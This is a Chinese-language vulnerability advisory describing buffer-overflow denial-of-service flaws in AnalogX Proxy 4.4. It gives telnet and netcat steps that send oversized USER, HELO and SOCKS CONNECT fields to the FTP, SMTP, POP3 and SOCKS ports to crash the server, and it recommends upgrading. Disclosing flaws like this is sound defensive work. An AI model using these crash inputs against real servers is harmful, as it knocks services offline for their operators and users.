AnalogX Proxy 服务器拒绝服务攻击漏洞
2010-03-22 中国IDC产业联盟
受影响系统:
AnalogX Proxy 4.4
不受影响系统:
AnalogX Proxy 4.6
AnalogX Proxy 4.5
描述:
AnalogX Proxy 是一个简单的代理服务器,允许用户通过代理网关访问Internet.
它的很多代理服务程序都包含缓冲区溢出漏洞,允许攻击者远程攻击代理服务器,
使之崩溃。通过发送特别长的一串参数给FTP,SMTP,POP3以及SOCKS代理服务端口,
都可能导致拒绝服务攻击。
<* 来源:Robin Keir(robin.keir@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. 发送一个包含超过370字节长的用户名的"USER"命令给代理服务器的FTP端口(21),
将导致代理服务器崩溃:
$ telnet www.porxy.com 21
USER [370个或者更多的字符]@isp.com
2. 发送一个包含超过370字节长的用户名的"HELO"命令给代理服务器的SMTP端口(25),
将导致代理服务器崩溃:
$ telnet www.porxy.com 25
HELO [370个或者更多的字符]@isp.com
3. 发送一个包含超过370字节长的用户名的"USER"命令给代理服务器的POP3端口(110),
将导致代理服务器崩溃:
$ telnet www.porxy.com 110
USER [370个或者更多的字符]@isp.com
4. 发送一个包含超过1800字节长的用户ID的"CONNECT"命令给代理服务器的SOCKS端口(1080),
将导致代理服务器崩溃:
$ nc www.proxy.com 1080 < socks.dat
socks.dat文件包含的二进制数据中用户ID域的长度超过1800字节
建议:
升级到更高版本的AnalogX Proxy 4.5/4.6
下载地址:
http://www.analogx.com/contents/download/network/proxy.htm